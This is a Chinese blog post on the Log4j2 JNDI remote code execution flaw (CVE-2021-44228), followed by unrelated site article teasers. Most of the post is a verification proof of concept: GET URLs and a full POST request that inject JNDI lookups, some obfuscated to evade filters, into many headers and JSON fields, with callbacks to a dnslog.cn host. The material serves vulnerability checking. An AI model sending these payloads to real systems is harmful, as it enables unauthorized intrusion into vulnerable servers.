Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)

news2024/11/17 5:29:12

漏洞描述:

当用户输入信息时,应用程序中的log4j 2组件会将信息记录到日志中

假如日志中包含有语句${jndi:ldap:attacker:1099/exp},log4j就会去解析该信息,通过jndi的lookup() 方法去解析该url:ldap:attacker:1099/exp

受害主机访问伪造的ldap服务,访问恶意java.class类,执行恶意代码。如果ldap没有解析成功会自动访问http

影响范围:

  Apache Log4j 2.x <= 2.14

条件:lookup()参数可控

漏洞验证:

1.get方式:

http://www.xxxx.cn/solr/admin/cores?action=${jndi:ldap://${sys:java.version}. xxxx.dnslog.cn }


http://www.xxx.cn/col/col3513?action=${jndi:ldap://${sys:java.version}.xxxx.dnslog.cn}

2.post方式:

poc

POST / HTTP/1.1
Host: www.xxxx.cn
Accept-Language: ${jndi:ldap://xxxx.dnslog.cn}
Accept: ${jndi:ldap://xxxx.dnslog.cn}
User-Agent: Mozilla ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/}
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Cache-Control: max-age=0
Abc: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Forwarded: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Remote-Addr: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Client-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Wap-Profile: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Cookie: ${jndi:ldap://xxxx.dnslog.cn}=${jndi:ldap://xxxx.dnslog.cn};JSESSIONID=${jndi:ldap://xxxx.dnslog.cn};SESSIONID=${jndi:ldap://xxxx.dnslog.cn};PHPSESSID=${jndi:ldap://xxxx.dnslog.cn};token=${jndi:ldap://xxxx.dnslog.cn/vulscan};session=${jndi:ldap://xxxx.dnslog.cn}
X-Remote-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
True-Client-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Cf-Connecting_ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Contact: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Originating-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Client-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
If-Modified-Since: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Real-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Originating-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Content-Type: application/json
Content-Length: 857

{"username": "${jndi:ldap://xxxx.dnslog.cn}", "account": "${jndi:ldap://xxxx.dnslog.cn}", "uid": "${jndi:ldap://xxxx.dnslog.cn}", "passwd": "${jndi:ldap://xxxx.dnslog.cn}", "userPassword": "${jndi:ldap://xxxx.dnslog.cn}", "pass": "${jndi:ldap://xxxx.dnslog.cn}", "email": "${jndi:ldap://xxxx.dnslog.cn}", "phone": "${jndi:ldap://xxxx.dnslog.cn}", "pwd": "${jndi:ldap://xxxx.dnslog.cn}", "id": "${jndi:ldap://xxxx.dnslog.cn}", "user": "${jndi:ldap://xxxx.dnslog.cn}", "login_password": "${jndi:ldap://xxxx.dnslog.cn}", "login_username": "${jndi:ldap://xxxx.dnslog.cn}", "userAccount": "${jndi:ldap://xxxx.dnslog.cn}", "password": "${jndi:ldap://xxxx.dnslog.cn}", "email_address": "${jndi:ldap://xxxx.dnslog.cn}", "payload": "${jndi:ldap://xxxx.dnslog.cn}"}

发送请求

DNSlog发送响应信息:

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2170705.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

vue-实现rtmp直播流

1、安装vue-video-player与videojs-flash npm install vue-video-player -S npm install videojs-flash --save 2、在main.js中引入 3、组件中使用 这样就能实现rtmp直播流在浏览器中播放&#xff0c;但有以下几点切记&#xff0c;不要入坑 1.安装vue-video-player插件一定…

Java.反射

目录 1.获取class 的三种方式 2.利用反射获取构造方法 3.利用反射获取成员变量 4.利用反射获取成员方法 1.获取class 的三种方式 全类名怎么找? 全类名报名&#xff0b;类名 package MyReflect;public class Student {private String id;private String name;private int…

LeetCode Hot100 C++ 哈希 1.两数之和

LeetCode Hot100 C 1.两数之和 给定一个整数数组 nums 和一个整数目标值 target&#xff0c;请你在该数组中找出 和为目标值 target 的那 两个整数&#xff0c;并返回它们的数组下标。 你可以假设每种输入只会对应一个答案&#xff0c;并且你不能使用两次相同的元素。 你可以按…

HTML5实现唐朝服饰网站模板源码

文章目录 1.设计来源1.1 网站首页-界面效果1.2 唐装演变-界面效果1.3 唐装配色-界面效果1.4 唐装花纹-界面效果1.5 唐装文化-界面效果 2.效果和源码2.1 动态效果2.2 源代码 源码下载万套模板&#xff0c;程序开发&#xff0c;在线开发&#xff0c;在线沟通 作者&#xff1a;xcL…

【DP解密多重背包问题】:优化策略与实现

文章目录 什么是多重背包问题&#xff1f;多重背包问题的数学模型 例题多重背包问题Ⅰ多重背包问题Ⅱ 总结 什么是多重背包问题&#xff1f; 多重背包问题是一个经典的组合优化问题。与标准背包问题不同&#xff0c;在多重背包问题中&#xff0c;每种物品可以选择多个&#xf…

数据链路层之以太网

目录 ​前言 什么是以太网&#xff1f; 以太网帧格式 6位源地址和目的地址 什么是MAC地址&#xff1f; MAC地址和IP地址的区别 2位类型 ARP协议 ARP协议的作用 ARP协议的工作流程 数据长度 MTU对IP协议的影响 CRC校验和 前言 在前面&#xff0c;我们已经讲了在TC…

安卓好软-----手机屏幕自动点击工具 无需root权限

工具可以设置后自动点击屏幕。可以用于一些操作。例如自动刷视频等等哦 工具介绍 一款可以帮你实现自动操作的软件。软件中你可以根据实际需要设置点击位置&#xff0c;可以是屏幕上的特定位置&#xff0c;也可以是按钮或控件。功能非常强大&#xff0c;但是操作非常简单&…

7个不为人知的实用软件推荐

今天再给大家分享7款不常被提及但又很好用的小众宝藏软件&#xff0c;强大实用&#xff0c;值得被更多的人看见&#xff01; 1.向日葵——电脑远程控制 下载链接&#xff1a;https://sunlogin.oray.com/ 对于很多电脑小白来说&#xff0c;其实很多软件安装、电脑调试之类的操…

Leetcode面试经典150题-383.赎金信

给你两个字符串&#xff1a;ransomNote 和 magazine &#xff0c;判断 ransomNote 能不能由 magazine 里面的字符构成。 如果可以&#xff0c;返回 true &#xff1b;否则返回 false 。 magazine 中的每个字符只能在 ransomNote 中使用一次。 示例 1&#xff1a; 输入&#…

联宇集团:如何利用CRM实现客户管理精细化与业务流程高效协同

在全球化的浪潮中&#xff0c;跨境电商正成为国际贸易的新引擎。作为领先的跨境电商物流综合服务商&#xff0c;广东联宇物流有限公司(以下称“联宇集团”)以其卓越的物流服务和前瞻的数字化战略&#xff0c;在全球市场中脱颖而出。本文将基于联宇集团搭建CRM系统的实际案例&am…

链表以及字符串数据求和及乘积问题

目录 ​编辑 <->本篇简介&#xff1a; <二>题目解析解答&#xff1a; 21大数乘法问题&#xff1a; ①题目&#xff1a; ②思路汇总&#xff1a; ③解答代码&#xff1a; 22 大数加法问题&#xff1a; ①题目&#xff1a; ②思路汇总&#xff1a; ③解答…

【数据结构中的哈希】

泛黄的春联还残留在墙上.......................................................................................................... 文章目录 前言 一、【哈希结构的介绍】 1.1【哈希结构的概念】 1.2【哈希冲突】 1.3【哈希函数的设计】 1.4【应对哈希冲突的办法】 一、…

PostgreSQL 一张表多个字段关联另一张表

event_catalog 表 event 表 sql SELECT event.event_uuid, event.event_case_id, event.event_status, event.event_catalog_1, event.event_catalog_2, event.event_catalog_3, event.event_title, event.event_content, event.event_source, event.event_purpose, event.eve…

JZ2440开发板——使用S3C2440操作Nand Flash

以下内容源于韦东山课程的学习与整理&#xff0c;如有侵权请告知删除。 本篇文章涉及以下文档资料&#xff1a;S3C2440数据手册、Nand Flash数据手册&#xff08;有三份&#xff0c;看K9F2G08U0C即可&#xff09;、JZ2440开发板原理图。 一、JZ2440上的Nand Flash JZ2440开发…

部署wordpress项目

一、先部署mariadb 二、在远程登录工具上进行登录测试&#xff0c;端口号为30117&#xff0c;用户为 root&#xff0c;密码为123 三、使用测试工具&#xff1a; [rootk8s-master aaa]# kubectl exec -it pods/cluster-test0-58689d5d5d-7c49r -- bash 四、部署wordpress [root…

楼上还是楼下的暖气,谁家更好蹭?

前几天收到个私信&#xff0c;想了解楼上楼下哪一户开暖气对中间影响大。我看到后就想&#xff0c;妙啊&#xff0c;这样就不需要开暖气&#xff0c;让邻居家的热气传过来&#xff0c;得省多少取暖费&#xff1f;不过站在热力学的角度&#xff0c;我们今天就来研究一下这个问题…

Xcode报错:The request was denied by service delegate (SBMainWorkspace)

Xcode报错&#xff1a;The request was denied by service delegate (SBMainWorkspace) 造成的原因: &#xff08;1&#xff09;新的M2芯片的Mac电脑 (2) 此电脑首次安装启动Xcode的应用程序 (3&#xff09;此电脑未安装Rosetta 解决方法: &#xff08;1&#xff09;打开终端…

电商IM客服系统的主要功能 网站即时通讯软件源码or SaaS

电商IM客服系统在现代电商平台中扮演着至关重要的角色&#xff0c;提供了高效的客户服务解决方案。系统的多功能特性使其能够实时响应客户需求&#xff0c;解决问题并增加转化率。以下是电商IM客服系统的六大功能 1、实时在线聊天&#xff1a;支持顾客与客服实时沟通&#xff0…

php thinkphp 小程序发送订阅模板消息通知

小程序需要在我的模板中先选用模板 小程序需要先订阅模板 wx.requestSubscribeMessage({tmplIds: ["XII_0By8D9WabnUjVPB_8S1itsm2d4_xxx"],success:

C++:string类写时拷贝|引用计数

✨ Blog’s 主页: 白乐天_ξ( ✿&#xff1e;◡❛) &#x1f308; 个人Motto&#xff1a;他强任他强&#xff0c;清风拂山冈&#xff01; &#x1f4ab; 欢迎来到我的学习笔记&#xff01; 写时拷贝&#xff08;了解&#xff09; 参考博客&#xff1a;C写时拷贝的不同方案&…